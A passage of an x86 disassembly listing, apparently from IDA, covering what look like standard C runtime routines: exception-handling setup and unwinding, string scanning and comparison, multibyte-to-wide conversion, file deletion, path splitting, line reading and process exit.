mov eax, [esp+8]
push 0
push eax
push dword ptr [eax+10h]
push dword ptr [eax+8]
push 0
push dword ptr [esp+20h]
push dword ptr [eax+0Ch]
push dword ptr [esp+20h]
call sub_41A7FD
add esp, 20h
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41551F proc near ; DATA XREF: sub_4156F0+B�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
cld
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
test eax, eax
jz short loc_415540
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_41558D
; ---------------------------------------------------------------------------
loc_415540: ; CODE XREF: sub_41551F+10�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
mov eax, [ebp+arg_4]
push dword ptr [eax+8]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push [ebp+arg_0]
call sub_41A7FD
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_41557E
push [ebp+arg_0]
push [ebp+arg_4]
call sub_415473
loc_41557E: ; CODE XREF: sub_41551F+52�j
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp dword ptr [ebx+18h]
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
loc_41558D: ; CODE XREF: sub_41551F+1F�j
pop ebx
pop ebp
retn
sub_41551F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415590 proc near ; CODE XREF: sub_41A55B+52�p
; sub_41A61B+E2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
jl short loc_4155E6
loc_4155AE: ; CODE XREF: sub_415590+51�j
cmp esi, 0FFFFFFFFh
jnz short loc_4155B8
call sub_41A8D4
loc_4155B8: ; CODE XREF: sub_415590+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
lea eax, [ebx+eax*4]
cmp [eax+4], ecx
jge short loc_4155CC
cmp ecx, [eax+8]
jle short loc_4155D1
loc_4155CC: ; CODE XREF: sub_415590+35�j
cmp esi, 0FFFFFFFFh
jnz short loc_4155DD
loc_4155D1: ; CODE XREF: sub_415590+3A�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_4155DD: ; CODE XREF: sub_415590+3F�j
cmp [ebp+arg_4], 0
jge short loc_4155AE
mov eax, [ebp+var_4]
loc_4155E6: ; CODE XREF: sub_415590+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_4155FA
cmp esi, eax
jbe short loc_4155FF
loc_4155FA: ; CODE XREF: sub_415590+64�j
call sub_41A8D4
loc_4155FF: ; CODE XREF: sub_415590+68�j
pop edi
lea eax, [esi+esi*4]
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_415590 endp
; =============== S U B R O U T I N E =======================================
sub_41560A proc near ; CODE XREF: sub_41A1D1+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov [esi], eax
call sub_416C45
mov eax, [eax+84h]
mov [esi+4], eax
call sub_416C45
mov [eax+84h], esi
mov eax, esi
pop esi
retn
sub_41560A endp
; =============== S U B R O U T I N E =======================================
sub_415632 proc near ; CODE XREF: sub_41A314+4B�p
arg_0 = dword ptr 4
call sub_416C45
mov eax, [eax+84h]
jmp short loc_41564A
; ---------------------------------------------------------------------------
loc_41563F: ; CODE XREF: sub_415632+1A�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_415650
mov eax, [eax+4]
loc_41564A: ; CODE XREF: sub_415632+B�j
test eax, eax
jnz short loc_41563F
inc eax
retn
; ---------------------------------------------------------------------------
loc_415650: ; CODE XREF: sub_415632+13�j
xor eax, eax
retn
sub_415632 endp
; =============== S U B R O U T I N E =======================================
sub_415653 proc near ; CODE XREF: sub_41A314+9�p
arg_0 = dword ptr 4
push esi
call sub_416C45
mov esi, [esp+4+arg_0]
cmp esi, [eax+84h]
jnz short loc_415675
call sub_416C45
mov ecx, [esi+4]
mov [eax+84h], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_415675: ; CODE XREF: sub_415653+10�j
call sub_416C45
mov eax, [eax+84h]
jmp short loc_41568B
; ---------------------------------------------------------------------------
loc_415682: ; CODE XREF: sub_415653+3C�j
mov ecx, [eax+4]
cmp esi, ecx
jz short loc_415697
mov eax, ecx
loc_41568B: ; CODE XREF: sub_415653+2D�j
cmp dword ptr [eax+4], 0
jnz short loc_415682
pop esi
jmp sub_41A8D4
; ---------------------------------------------------------------------------
loc_415697: ; CODE XREF: sub_415653+34�j
mov ecx, [esi+4]
mov [eax+4], ecx
pop esi
retn
sub_415653 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41569F proc near ; CODE XREF: sub_41A1D1+71�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 14h
mov eax, [ebp+arg_4]
and [ebp+var_14], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_10], offset loc_4154FB
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_14], eax
lea eax, [ebp+var_14]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_41A910
mov ecx, eax
mov eax, [ebp+var_14]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_41569F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4156F0 proc near ; CODE XREF: sub_41A55B+33�p
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
and [ebp+var_28], 0
mov [ebp+var_24], offset sub_41551F
mov eax, [ebp+arg_10]
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_14]
mov [ebp+var_18], eax
mov eax, [ebp+arg_18]
mov [ebp+var_14], eax
and [ebp+var_10], 0
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_10], offset loc_415773
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call sub_416C45
call dword ptr [eax+74h]
pop ecx
pop ecx
and [ebp+var_34], 0
loc_415773: ; DATA XREF: sub_4156F0+3A�o
cmp [ebp+var_4], 0
jz short loc_415790
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_415799
; ---------------------------------------------------------------------------
loc_415790: ; CODE XREF: sub_4156F0+87�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_415799: ; CODE XREF: sub_4156F0+9E�j
mov eax, [ebp+var_34]
pop ebx
leave
retn
sub_4156F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4157A0 proc near ; CODE XREF: sub_41CED0+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4157B8
push [ebp+arg_0]
call sub_41F3D6 ; RtlUnwind
loc_4157B8: ; DATA XREF: sub_4157A0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4157A0 endp
; =============== S U B R O U T I N E =======================================
sub_4157C0 proc near ; DATA XREF: sub_4157E2+A�o
; sub_41584A+9�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4157E1
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4157E1: ; CODE XREF: sub_4157C0+10�j
retn
sub_4157C0 endp
; =============== S U B R O U T I N E =======================================
sub_4157E2 proc near ; CODE XREF: sub_41CED0+67�p
; sub_41CED0+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4157C0
push large dword ptr fs:0
mov large fs:0, esp
loc_4157FF: ; CODE XREF: sub_4157E2:loc_41583A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_41583C
cmp esi, [esp+1Ch+arg_4]
jz short loc_41583C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_41583A
push 101h
mov eax, [ebx+esi*4+8]
call sub_415876
call dword ptr [ebx+esi*4+8]
loc_41583A: ; CODE XREF: sub_4157E2+44�j
jmp short loc_4157FF
; ---------------------------------------------------------------------------
loc_41583C: ; CODE XREF: sub_4157E2+2A�j
; sub_4157E2+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4157E2 endp
; =============== S U B R O U T I N E =======================================
sub_41584A proc near ; CODE XREF: sub_41A314+55�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4157C0
jnz short locret_41586C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_41586C
mov eax, 1
locret_41586C: ; CODE XREF: sub_41584A+10�j
; sub_41584A+1B�j
retn
sub_41584A endp
; =============== S U B R O U T I N E =======================================
sub_41586D proc near ; CODE XREF: sub_41A910+1E�p
; sub_41A910+40�p
push ebx
push ecx
mov ebx, offset dword_42D7C0
jmp short loc_415880
sub_41586D endp
; =============== S U B R O U T I N E =======================================
sub_415876 proc near ; CODE XREF: sub_4157E2+4F�p
; sub_41CED0+78�p
push ebx
push ecx
mov ebx, offset dword_42D7C0
mov ecx, [ebp+8]
loc_415880: ; CODE XREF: sub_41586D+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_415876 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415890 proc near ; CODE XREF: sub_407028+5�p
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_415890 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_4158C0
loc_4158B0: ; CODE XREF: sub_4158C0+1F�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_4158C0
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4158C0 proc near ; CODE XREF: sub_4070A9+21�p
; sub_4077E4+32�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
; FUNCTION CHUNK AT 004158B0 SIZE 00000005 BYTES
xor eax, eax
mov al, [esp+arg_4]
loc_4158C6: ; CODE XREF: sub_414EE0+74�j
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_4158ED
loc_4158D8: ; CODE XREF: sub_4158C0+2B�j
mov cl, [edx]
add edx, 1
cmp cl, bl
jz short loc_4158B0
test cl, cl
jz short loc_415936
test edx, 3
jnz short loc_4158D8
loc_4158ED: ; CODE XREF: sub_4158C0+16�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_4158F8: ; CODE XREF: sub_4158C0+63�j
; sub_4158C0+72�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_41593A
and eax, 81010100h
jz short loc_4158F8
and eax, 1010100h
jnz short loc_415934
and esi, 80000000h
jnz short loc_4158F8
loc_415934: ; CODE XREF: sub_4158C0+6A�j
; sub_4158C0+83�j ...
pop esi
pop edi
loc_415936: ; CODE XREF: sub_4158C0+23�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41593A: ; CODE XREF: sub_4158C0+5C�j
mov eax, [edx-4]
cmp al, bl
jz short loc_415977
test al, al
jz short loc_415934
cmp ah, bl
jz short loc_415970
test ah, ah
jz short loc_415934
shr eax, 10h
cmp al, bl
jz short loc_415969
test al, al
jz short loc_415934
cmp ah, bl
jz short loc_415962
test ah, ah
jz short loc_415934
jmp short loc_4158F8
; ---------------------------------------------------------------------------
loc_415962: ; CODE XREF: sub_4158C0+9A�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_415969: ; CODE XREF: sub_4158C0+92�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_415970: ; CODE XREF: sub_4158C0+87�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_415977: ; CODE XREF: sub_4158C0+7F�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_4158C0 endp
; =============== S U B R O U T I N E =======================================
sub_41597E proc near ; CODE XREF: sub_4076B0+55�p
; sub_40FE91+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
loc_415982: ; CODE XREF: sub_41597E+C�j
mov cx, [eax]
inc eax
inc eax
test cx, cx
jnz short loc_415982
sub eax, [esp+arg_0]
sar eax, 1
dec eax
retn
sub_41597E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415994 proc near ; CODE XREF: sub_415A8A+22�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
mov edx, [ebp+arg_4]
push ebx
push esi
xor esi, esi
xor eax, eax
cmp edx, esi
push edi
jz loc_415A5B
mov ebx, [ebp+arg_C]
cmp ebx, esi
jz loc_415A85
mov edi, [ebp+arg_0]
cmp [edi+14h], esi
jnz short loc_4159E6
cmp ebx, esi
jbe loc_415A85
loc_4159C5: ; CODE XREF: sub_415994+4B�j
mov ecx, [ebp+arg_8]
add ecx, eax
movzx si, byte ptr [ecx]
mov [edx], si
cmp byte ptr [ecx], 0
jz loc_415A85
inc eax
inc edx
inc edx
cmp eax, ebx
jb short loc_4159C5
jmp loc_415A85
; ---------------------------------------------------------------------------
loc_4159E6: ; CODE XREF: sub_415994+27�j
mov esi, ds:dword_4200D4
push ebx
mov ebx, [ebp+arg_8]
push edx
push 0FFFFFFFFh
push ebx
push 9
push dword ptr [edi+4]
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_415A84
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_415A1E
loc_415A0E: ; CODE XREF: sub_415994+C5�j
; sub_415994+EE�j
call sub_419430
mov dword ptr [eax], 2Ah
or eax, 0FFFFFFFFh
jmp short loc_415A85
; ---------------------------------------------------------------------------
loc_415A1E: ; CODE XREF: sub_415994+78�j
mov eax, [ebp+arg_C]
mov [ebp+var_4], eax
mov eax, ebx
loc_415A26: ; CODE XREF: sub_415994+AE�j
mov cl, [eax]
dec [ebp+var_4]
test cl, cl
jz short loc_415A44
mov edx, [edi+48h]
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_415A3D
inc eax
loc_415A3D: ; CODE XREF: sub_415994+A6�j
inc eax
cmp [ebp+var_4], 0
jnz short loc_415A26
loc_415A44: ; CODE XREF: sub_415994+99�j
push [ebp+arg_C]
sub eax, ebx
push [ebp+arg_4]
push eax
push ebx
push 1
push dword ptr [edi+4]
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_415A85
jmp short loc_415A0E
; ---------------------------------------------------------------------------
loc_415A5B: ; CODE XREF: sub_415994+10�j
mov eax, [ebp+arg_0]
cmp [eax+14h], esi
jnz short loc_415A6E
push [ebp+arg_8]
call sub_4177F0
pop ecx
jmp short loc_415A85
; ---------------------------------------------------------------------------
loc_415A6E: ; CODE XREF: sub_415994+CD�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_8]
push 9
push dword ptr [eax+4]
call ds:dword_4200D4 ; MultiByteToWideChar
cmp eax, esi
jz short loc_415A0E
loc_415A84: ; CODE XREF: sub_415994+69�j
dec eax
loc_415A85: ; CODE XREF: sub_415994+1B�j
; sub_415994+2B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_415994 endp
; =============== S U B R O U T I N E =======================================
sub_415A8A proc near ; CODE XREF: sub_4076B0+19�p
; sub_4076B0+49�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_416C45
mov eax, [eax+64h]
cmp eax, off_42D84C
jz short loc_415A9F
call sub_417A7E
loc_415A9F: ; CODE XREF: sub_415A8A+E�j
push [esp+arg_8]
push [esp+4+arg_4]
push [esp+8+arg_0]
push eax
call sub_415994
add esp, 10h
retn
sub_415A8A endp
; =============== S U B R O U T I N E =======================================
sub_415AB5 proc near ; CODE XREF: sub_4089DC+51AB�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_4200E4 ; DeleteFileA
test eax, eax
jnz short loc_415ACB
call ds:dword_420008 ; RtlGetLastWin32Error
jmp short loc_415ACD
; ---------------------------------------------------------------------------
loc_415ACB: ; CODE XREF: sub_415AB5+C�j
xor eax, eax
loc_415ACD: ; CODE XREF: sub_415AB5+14�j
test eax, eax
jz short loc_415ADC
push eax
call sub_419442
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_415ADC: ; CODE XREF: sub_415AB5+1A�j
xor eax, eax
retn
sub_415AB5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415ADF proc near ; CODE XREF: sub_4089DC+5115�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push 14h
push offset stru_428D78
call __SEH_prolog
mov esi, [ebp+arg_0]
mov [ebp+var_1C], esi
push esi
call sub_417E28
pop ecx
and [ebp+ms_exc.disabled], 0
push esi
call sub_41A95C
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push esi
call sub_416492
mov [ebp+var_24], eax
push esi
push [ebp+var_20]
call sub_41A9E4
add esp, 18h
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_415B33
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_415ADF endp
; =============== S U B R O U T I N E =======================================
sub_415B33 proc near ; CODE XREF: sub_415ADF+46�p
; DATA XREF: .rdata:stru_428D78�o
push dword ptr [ebp-1Ch]
call sub_417E7A
pop ecx
retn
sub_415B33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B3D proc near ; CODE XREF: sub_4089DC+431F�p
; sub_40E6BB+F6�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_4177F0
cmp eax, 1
pop ecx
jb short loc_415B79
cmp byte ptr [ebx+1], 3Ah
jnz short loc_415B79
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_415B75
push 2
push ebx
push esi
call sub_41AF6B
add esp, 0Ch
and byte ptr [esi+2], 0
loc_415B75: ; CODE XREF: sub_415B3D+26�j
inc ebx
inc ebx
jmp short loc_415B83
; ---------------------------------------------------------------------------
loc_415B79: ; CODE XREF: sub_415B3D+19�j
; sub_415B3D+1F�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_415B83
and byte ptr [eax], 0
loc_415B83: ; CODE XREF: sub_415B3D+3A�j
; sub_415B3D+41�j
and [ebp+arg_0], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov [ebp+var_8], eax
mov esi, 0FFh
jz short loc_415BFB
loc_415B96: ; CODE XREF: sub_415B3D+88�j
mov cl, [eax]
movzx edx, cl
test byte_47C761[edx], 4
jz short loc_415BA7
inc eax
jmp short loc_415BC1
; ---------------------------------------------------------------------------
loc_415BA7: ; CODE XREF: sub_415B3D+65�j
cmp cl, 2Fh
jz short loc_415BBB
cmp cl, 5Ch
jz short loc_415BBB
cmp cl, 2Eh
jnz short loc_415BC1
mov [ebp+var_4], eax
jmp short loc_415BC1
; ---------------------------------------------------------------------------
loc_415BBB: ; CODE XREF: sub_415B3D+6D�j
; sub_415B3D+72�j
lea ecx, [eax+1]
mov [ebp+arg_0], ecx
loc_415BC1: ; CODE XREF: sub_415B3D+68�j
; sub_415B3D+77�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_415B96
mov edi, [ebp+arg_0]
test edi, edi
mov [ebp+var_8], eax
jz short loc_415BFB
cmp [ebp+arg_8], 0
jz short loc_415BF6
sub edi, ebx
cmp edi, esi
jb short loc_415BDF
mov edi, esi
loc_415BDF: ; CODE XREF: sub_415B3D+9E�j
push edi
push ebx
push [ebp+arg_8]
call sub_41AF6B
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_415BF6: ; CODE XREF: sub_415B3D+98�j
mov ebx, [ebp+arg_0]
jmp short loc_415C05
; ---------------------------------------------------------------------------
loc_415BFB: ; CODE XREF: sub_415B3D+57�j
; sub_415B3D+92�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_415C05
and byte ptr [ecx], 0
loc_415C05: ; CODE XREF: sub_415B3D+BC�j
; sub_415B3D+C3�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_415C58
cmp edi, ebx
jb short loc_415C58
cmp [ebp+arg_C], 0
jz short loc_415C35
sub edi, ebx
cmp edi, esi
jb short loc_415C1E
mov edi, esi
loc_415C1E: ; CODE XREF: sub_415B3D+DD�j
push edi
push ebx
push [ebp+arg_C]
call sub_41AF6B
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+var_8]
loc_415C35: ; CODE XREF: sub_415B3D+D7�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_415C80
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_415C45
mov esi, eax
loc_415C45: ; CODE XREF: sub_415B3D+104�j
push esi
push [ebp+var_4]
push edi
call sub_41AF6B
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_415C80
; ---------------------------------------------------------------------------
loc_415C58: ; CODE XREF: sub_415B3D+CD�j
; sub_415B3D+D1�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_415C76
sub eax, ebx
cmp eax, esi
jnb short loc_415C67
mov esi, eax
loc_415C67: ; CODE XREF: sub_415B3D+126�j
push esi
push ebx
push edi
call sub_41AF6B
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_415C76: ; CODE XREF: sub_415B3D+120�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_415C80
and byte ptr [eax], 0
loc_415C80: ; CODE XREF: sub_415B3D+FD�j
; sub_415B3D+119�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_415B3D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415C85 proc near ; CODE XREF: sub_4089DC+37A0�p
; sub_4089DC+37CD�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 18h
push offset stru_428D88
call __SEH_prolog
mov ebx, [ebp+arg_0]
mov edi, ebx
mov [ebp+var_1C], ebx
cmp [ebp+arg_4], 0
jg short loc_415CA3
xor eax, eax
jmp short loc_415CFA
; ---------------------------------------------------------------------------
loc_415CA3: ; CODE XREF: sub_415C85+18�j
mov esi, [ebp+arg_8]
mov [ebp+var_20], esi
push esi
call sub_417E28
pop ecx
and [ebp+ms_exc.disabled], 0
loc_415CB4: ; CODE XREF: sub_415C85+64�j
dec [ebp+arg_4]
jz short loc_415CEB
dec dword ptr [esi+4]
js short loc_415CC8
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_415CCF
; ---------------------------------------------------------------------------
loc_415CC8: ; CODE XREF: sub_415C85+37�j
push esi
call sub_418C09
pop ecx
loc_415CCF: ; CODE XREF: sub_415C85+41�j
mov [ebp+var_24], eax
cmp eax, 0FFFFFFFFh
jnz short loc_415CE1
cmp edi, ebx
jnz short loc_415CEB
and [ebp+var_1C], 0
jmp short loc_415CEE
; ---------------------------------------------------------------------------
loc_415CE1: ; CODE XREF: sub_415C85+50�j
mov [edi], al
inc edi
mov [ebp+var_28], edi
cmp al, 0Ah
jnz short loc_415CB4
loc_415CEB: ; CODE XREF: sub_415C85+32�j
; sub_415C85+54�j
and byte ptr [edi], 0
loc_415CEE: ; CODE XREF: sub_415C85+5A�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_415D03
mov eax, [ebp+var_1C]
loc_415CFA: ; CODE XREF: sub_415C85+1C�j
call __SEH_epilog
retn
sub_415C85 endp
; =============== S U B R O U T I N E =======================================
sub_415D00 proc near ; DATA XREF: .rdata:stru_428D88�o
mov esi, [ebp-20h]
sub_415D00 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_415D03 proc near ; CODE XREF: sub_415C85+6D�p
push esi
call sub_417E7A
pop ecx
retn
sub_415D03 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415D10 proc near ; CODE XREF: sub_4089DC+8D4�p
; sub_411DD2+285�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_415D42
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_415D40
jz short loc_415D42
sub ecx, 2
loc_415D40: ; CODE XREF: sub_415D10+29�j
not ecx
loc_415D42: ; CODE XREF: sub_415D10+9�j
; sub_415D10+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_415D10 endp
; =============== S U B R O U T I N E =======================================
sub_415D49 proc near ; CODE XREF: sub_415DF0+CB�p
; sub_4160F5+1C�p
arg_0 = dword ptr 4
push offset aMscoree_dll ; "mscoree.dll"
call ds:dword_4200A4 ; GetModuleHandleA
test eax, eax
jz short loc_415D6E
push offset aCorexitprocess ; "CorExitProcess"
push eax
call ds:dword_420084 ; GetProcAddress
test eax, eax
jz short loc_415D6E
push [esp+arg_0]
call eax ; dword_42B030
loc_415D6E: ; CODE XREF: sub_415D49+D�j
; sub_415D49+1D�j
push [esp+arg_0]
call ds:dword_420034 ; ExitProcess
int 3 ; Trap to Debugger
loc_415D79: ; CODE XREF: sub_41B0A6+C�p
push 8
call sub_4180B5
pop ecx
retn
sub_415D49 endp
; =============== S U B R O U T I N E =======================================
sub_415D82 proc near ; CODE XREF: sub_41B0D8�p
push 8
call sub_418021
pop ecx
retn
sub_415D82 endp
; =============== S U B R O U T I N E =======================================
